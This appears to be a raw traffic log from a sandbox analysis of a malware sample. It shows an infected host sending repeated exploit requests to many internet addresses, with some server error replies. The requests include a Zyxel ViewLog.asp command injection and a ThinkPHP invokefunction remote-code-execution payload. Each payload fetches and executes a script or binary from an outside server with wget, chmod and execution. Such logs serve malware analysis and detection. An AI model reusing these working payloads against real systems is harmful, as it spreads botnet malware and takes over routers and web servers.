                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      807192.168.2.154952294.123.46.258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.312263012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      808192.168.2.153286294.123.178.28080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.313064098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      809192.168.2.153978894.121.43.2398080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.315259933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      810192.168.2.153995231.136.144.328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.497165918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:44.184088945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.527925014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:48.215806961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.591983080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:04.343364954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:26.358902931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:09.365600109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      811192.168.2.153867295.142.190.20180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.724522114 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      812192.168.2.153504495.101.88.18680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.733535051 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:43.954703093 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:43 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:43 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 31 64 64 35 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 33 26 23 34 36 3b 32 36 65 62 63 64 34 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d1dd517&#46;1707899443&#46;26ebcd42</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      813192.168.2.155969095.100.205.13280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.758352995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:44.003983021 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:43 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:43 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 36 63 61 34 64 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 33 26 23 34 36 3b 32 39 31 37 38 33 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;66ca4d68&#46;1707899443&#46;2917834</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      814192.168.2.154582695.167.23.1780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.761363029 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      815192.168.2.153965695.7.114.10380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.784051895 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      816192.168.2.155816845.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.820173979 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:43Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      817192.168.2.155223288.221.37.3180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.927469015 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:44.131093979 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:44 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:44 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 34 26 23 34 36 3b 31 38 39 64 35 63 34 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;97341060&#46;1707899444&#46;189d5c4a</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      818192.168.2.155517688.116.240.680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:43.986490011 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      819192.168.2.155820445.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:44.338203907 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:44Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      820192.168.2.155972295.179.146.20380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:44.413480997 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:44.612704039 CET404INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:44 GMT
                                                      Server: Apache
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      821192.168.2.153396695.244.58.8380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:44.630446911 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:44.848043919 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0
                                                      Date: Wed, 14 Feb 2024 08:30:44 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      822192.168.2.154120895.217.237.3680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:44.640108109 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:44.868016958 CET315INHTTP/1.1 400 Bad Request
                                                      Server: openresty
                                                      Date: Wed, 14 Feb 2024 08:30:44 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 154
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      823192.168.2.155822045.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:44.852071047 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:44Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      824192.168.2.155823645.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:45.357058048 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
